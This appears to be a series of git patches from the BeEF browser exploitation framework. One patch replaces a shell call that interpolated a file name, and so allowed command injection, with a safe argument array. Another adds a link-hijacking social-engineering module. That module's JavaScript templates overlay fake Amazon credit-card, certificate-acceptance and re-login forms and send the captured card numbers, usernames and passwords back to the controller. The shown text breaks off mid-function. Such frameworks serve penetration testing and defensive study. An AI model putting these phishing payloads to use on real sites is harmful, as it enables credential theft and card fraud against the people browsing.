                 user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
             mass_mailer:
+                # NOTE: you must have 'file' in your PATH
                 user_agent: "Microsoft-MacOutlook/12.12.0.111556"
                 host: "smtp.gmail.com"
                 port: 587

From 31387a0aa696b03c0e7a83688672893eed998c7b Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 2 Sep 2012 19:00:40 +0100
Subject: [PATCH 023/397] Social Eng. extension: massmailer -> calling IO.popen
 in a secure way

---
 extensions/social_engineering/mass_mailer/mass_mailer.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index 2e61b4dd8..221ca73e7 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -222,9 +222,10 @@ EOF
         end
 
         def get_mime(file_path)
-          mime = "file --mime -b #{file_path}"
           result = ""
-          IO.popen(mime.to_s) { |f| result = f.gets.split(";").first }
+          IO.popen(["file", "--mime","-b", "#{file_path}"], 'r+') do |io|
+            result = io.readlines.first.split(";").first
+          end
           result
         end
 

From 931aeb6ee591c94adf9232900a78a6260b39f32b Mon Sep 17 00:00:00 2001
From: qswain2 <qswain2@washcoll.edu>
Date: Mon, 3 Sep 2012 09:46:03 -0400
Subject: [PATCH 024/397] Fixed the module count in the ui to include sub
 modules (issue 708)

---
 extensions/admin_ui/controllers/modules/modules.rb | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index a3d0c087c..b10ccc4bf 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -591,12 +591,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     # append the number of command modules so the branch name results in: "<category name> (num)"
     parent.each {|command_module_branch|
       if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children')
-        num_of_command_modules = command_module_branch['children'].length
-        command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
-
+        num_of_subs = 0
         command_module_branch['children'].each {|c|
+          #add in the submodules and subtract 1 for the folder node
+          num_of_subs+=c['children'].length-1 if c.has_key?('children')
           retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder'
         }
+        num_of_command_modules = command_module_branch['children'].length + num_of_subs
+        command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
+
       end
     }
   end

From 05d7fe3adf0a48d879894c2affaa53418e49a306 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Tue, 4 Sep 2012 17:47:59 +0200
Subject: [PATCH 025/397] Adding the Simple Hijacker module in social
 engineering (route clicks on some links to javascript code)

---
 .../simple_hijacker/command.js                |  37 ++++++
 .../simple_hijacker/config.yaml               |  26 +++++
 .../simple_hijacker/module.rb                 |  50 +++++++++
 .../simple_hijacker/templates/amazon.js       |  28 +++++
 .../templates/chromecertbeggar.js             |  50 +++++++++
 .../simple_hijacker/templates/confirmbox.js   |  10 ++
 .../simple_hijacker/templates/credential.js   | 105 ++++++++++++++++++
 7 files changed, 306 insertions(+)
 create mode 100644 modules/social_engineering/simple_hijacker/command.js
 create mode 100644 modules/social_engineering/simple_hijacker/config.yaml
 create mode 100644 modules/social_engineering/simple_hijacker/module.rb
 create mode 100644 modules/social_engineering/simple_hijacker/templates/amazon.js
 create mode 100644 modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
 create mode 100644 modules/social_engineering/simple_hijacker/templates/confirmbox.js
 create mode 100644 modules/social_engineering/simple_hijacker/templates/credential.js

diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js
new file mode 100644
index 000000000..adcc3e4b2
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/command.js
@@ -0,0 +1,37 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+hijack = function(){
+    function send(answer){
+      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);	
+    }
+    <% target = @targets.split(',') %>   
+    $j('a').click(function(e) {
+      e.preventDefault();
+      if ($j(this).attr('href') != '')
+      { 
+        if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{			
+          <%= instance_variable_get("@#{@choosetmpl}") %>
+          beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
+        }
+      }
+    });
+}
+
+beef.execute(function() {
+	hijack();
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
+});
diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml
new file mode 100644
index 000000000..8fbb9209d
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        simple_hijacker:
+            enable: true
+            category: "Social Engineering"
+            name: "Simple Hijacker"
+            description: "Hijack clicks on links to display what you want."
+            templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
+            authors: ["gallypette"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb
new file mode 100644
index 000000000..d9a66c1dd
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/module.rb
@@ -0,0 +1,50 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Simple_hijacker < BeEF::Core::Command
+
+  def self.options
+
+    config = BeEF::Core::Configuration.instance
+    @templates = config.get('beef.module.simple_hijacker.templates')
+
+    # Defines which domains to target
+    data = []
+    data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
+    
+    # We'll then list all templates available 
+    tmptpl = []
+    @templates.each{ |template|
+      tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
+        raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
+        file = File.open(tplpath, "r")
+        data.push({'name' => template, 'type' => 'hidden', 'value' => file.read})
+      tmptpl<<[ template]
+    }
+ 
+    data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
+      
+    return data
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    save({'answer' => @datastore['answer']})
+  end
+  
+end
diff --git a/modules/social_engineering/simple_hijacker/templates/amazon.js b/modules/social_engineering/simple_hijacker/templates/amazon.js
new file mode 100644
index 000000000..0c58ba121
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/amazon.js
@@ -0,0 +1,28 @@
+  beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+	$j(document).attr('title', $j(this).html());
+	document.body.scroll = 'no';
+	document.documentElement.style.overflow = 'hidden';
+	
+	collect = function(){
+	  answer = "";
+		$j(":input").each(function() {
+		  answer += " "+$j(this).attr("name")+":"+$j(this).val();
+		});
+		send(answer);
+	}
+	
+		// floating div
+	function writediv() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'hax');
+		sneakydiv.setAttribute('display', 'block');
+		sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
+		document.body.appendChild(sneakydiv);
+		sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>&gt;</b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans>&nbsp; Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select>&nbsp;<select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>';
+	}
+
+	writediv();
+	
+	$j("#confirm").click(function () {
+      $j('#hax').remove();
+  });
diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
new file mode 100644
index 000000000..d1adce6d5
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
@@ -0,0 +1,50 @@
+  // floating div
+	function writediv() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'background');
+		sneakydiv.setAttribute('oncontextmenu','return false;');
+		sneakydiv.setAttribute('style', 'overflow:hidden;position:absolute;width:100%;height:100%;top:0px;left:0px;z-index:51;opacity:1;background-color:#500; font-family:Helvetica,Arial,sans-serif; margin:0px;');
+		document.body.appendChild(sneakydiv);
+		sneakydiv.innerHTML= '<div style="position:absolute;width:100%;height:100%;"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAJFCAIAAACTIQqNAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAQRJREFUSMe9lVtyxTAIQyUW0C10v9306Qd+NNNeYyfT+8EkEwRIBpz4+vgMSYU5nyYsB+R3u4orzArRnr0OComwHRKBFO7132IOmwCFpUDJY3AdGLVzoL1nnHDIBHLGN8w8L4f4kc8ORBgPHJdab7TRi86fa39IrnrKD1I3tNniZq7kOThylgcpfNGX83aaQ2p9X+mg9VV9hza50mps6KP3cKNHF+yOzlbbQ/OKb+5vpRHyTnnF84TjqLXQjVjPbZuFCjf1b/BaYKbv9eywUYeHPDK/F5i1H1HORaVjz/8bk/+HeV9xqH3GV7z+7lGVu9qZ+szOff8Vy8b+39H5JPZuzELHNyoGruezaO1kAAAAAElFTkSuQmCC" width="100%" height="100%" alt="background" onmousedown="return false;"></div><table width="100%" cellspacing=0 cellpadding=0><td style=padding:40px valign=middle align=center><div style="width:60%; background-color:white; color:black; font-size:10pt; line-height:16pt; text-align:left; padding:20px; position:relative; -webkit-box-shadow:3px 3px 8px #200; border-radius:5px"><div style=position:absolute><img src="data:image/png;base64,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" alt="SSL Error Icon" onmousedown="return false"></div><div style="margin: 0px 77px 0px; font-size:18pt; line-height: 140%; margin-bottom:6pt; font-weight:bold; color:#660000">Please accept our new SELF&#174;-Signed Certificate to ensure maximum security protection.</div><div style="margin:0px 80px 0px">'+domain+' chose SELF&#174; to protect your security. If your browser raise any warning after this one it means that it\'s not up-to-date. Accept this certificate then please consider updating your browser as soon as possible.<br><br>SELF&#174; - to make the Internet a safer place.</div><div style="margin:0px 80px 0px"></div><div style="margin:0px 80px 0px"><form style="margin:15px 5px 15px 0px;padding:0px"><input type=button value=continue name=back onclick="forward()"></form></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_short><a href="#" onclick="toggleMoreInfo(false); return false" onmousedown="return false"><img id=twisty_closed src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAANklEQVR42q3QMQoAMAgEwfz/05dcoVcEYQuFwWYL8Uhqb+Q9+WLDcYFxwDhgHDjev3n/z96TCxE/Ie1QsznxAAAAAElFTkSuQmCC" border=0 style=display:none><img id=twisty_closed_rtl src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMklEQVQY02P4jwcwMDCg8vEpJEoxTCFBxcgK8SpGV4hTMTaF1DGZZDeTHBokhzOuGAQAxQt2mANh8/IAAAAASUVORK5CYII=" border=0 style=display:none><span i18n-content=moreInfoTitle style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a></div><div style="margin:30px 80px 0px; border-top:1px solid #ccc; padding-top:6px" id=more_info_long style=display:none><a href="#" onclick="toggleMoreInfo(true); return false" onmousedown="return false"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAsAAAALCAYAAACprHcmAAAAMUlEQVQY02P4//8/A7GYgXaKgeA/0Riqg6BCFGcQUojhZnwKsXoQl0KcoYFNIW3DGQCkVyHtwOU6YQAAAABJRU5ErkJggg==" border=0><span style="margin-left:5px;margin-right:5px">read more about the SELF&#174; certification authority</span></a><p i18n-values=.innerHTML:moreInfo1>Security Enhanced Layer Factory&#174;: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF&#174; help people as customer or seller to feel safe by issuing SELF&#174;-signed certificate that are build to last. With SELF&#174; you will never be harmed again - Trust is our workship.</p><p i18n-values=.innerHTML:moreInfo2>Security Enhanced Layer Factory&#174;, SELF&#174; and SELF&#174; logo are registered trademarks.</p></div></div></td></table>';
+	  toggleMoreInfo(true);
+		setDirectionSensitiveImages();
+	}
+
+  forward = function(){
+    send("User continuing to "+target);
+    timer=setInterval(function(){window.location = target;},500);
+  }
+  
+  getDomain = function(url){
+    return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2];
+  }
+  
+  function $(o) {return document.getElementById(o);}
+
+  sendCommand = function(cmd) {
+    window.domAutomationController.setAutomationId(1);
+    window.domAutomationController.send(cmd);
+  }
+
+  toggleMoreInfo = function(collapse) {
+    if (collapse) {
+      $("more_info_long").style.display = "none";
+      $("more_info_short").style.display = "block";
+    } else {
+      $("more_info_long").style.display = "block";
+      $("more_info_short").style.display = "none";
+    }
+  }
+  setDirectionSensitiveImages = function () {
+    if (document.documentElement.dir == 'rtl') {
+      $("twisty_closed_rtl").style.display = "inline";
+    } else {
+      $("twisty_closed").style.display = "inline";
+    }
+  }
+  
+  target = $j(this).attr('href');
+	domain = getDomain(target);
+  $j(document).attr('title', domain+" Security Enhanced Layer Factory&#174; certificate acceptance");
+	writediv();
+	
diff --git a/modules/social_engineering/simple_hijacker/templates/confirmbox.js b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
new file mode 100644
index 000000000..d8c79bc7b
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
@@ -0,0 +1,10 @@
+var answer = confirm("Do you really want to leave us ??")
+if (answer){
+	alert("Okay :(")
+	send("User chose to leave.");
+	window.location = $j(this).attr('href');
+}
+else{
+	alert("Okay enjoy ")
+	send("User chose to stay.");
+}
diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js
new file mode 100644
index 000000000..d0b1eacb0
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/credential.js
@@ -0,0 +1,105 @@
+	imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
+	var answer= '';
+	
+	beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+	$j(document).attr('title', $j(this).html());
+	document.body.scroll = 'no';
+	document.documentElement.style.overflow = 'hidden';
+	
+	// set up darkening
+	function grayOut(vis, options) {
+	  // Pass true to gray out screen, false to ungray
+	  // options are optional.  This is a JSON object with the following (optional) properties
+	  // opacity:0-100         // Lower number = less grayout higher = more of a blackout 
+	  // zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+	  // bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+	  // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
+	  // Because options is JSON opacity/zindex/bgcolor are all optional and can appear
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || 50;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	}
+
+	// function to send response
+	function win(){
+		document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
+		answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
+	}
+
+	// perform darkening
+	grayOut(true);
+
+	function checker(){
+		processval = document.body.lastChild.getElementsByTagName("input")[2].value;
+		if (processval == "Processing..") {
+			uname = document.body.lastChild.getElementsByTagName("input")[0].value;
+			pass = document.body.lastChild.getElementsByTagName("input")[1].value;
+			answer = uname+":"+pass
+  		send(answer);
+			// set lastchild invisible
+			document.body.lastChild.setAttribute('style','display:none');
+			// lighten screen
+			grayOut(false);
+			clearInterval(credgrabber);
+			$j('#hax').remove();
+			$j('#darkenScreenObject').remove();
+		}
+	}
+
+
+	// floating div
+	function writeit() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'hax');
+		sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+		sneakydiv.setAttribute('align', 'center');
+		document.body.appendChild(sneakydiv);
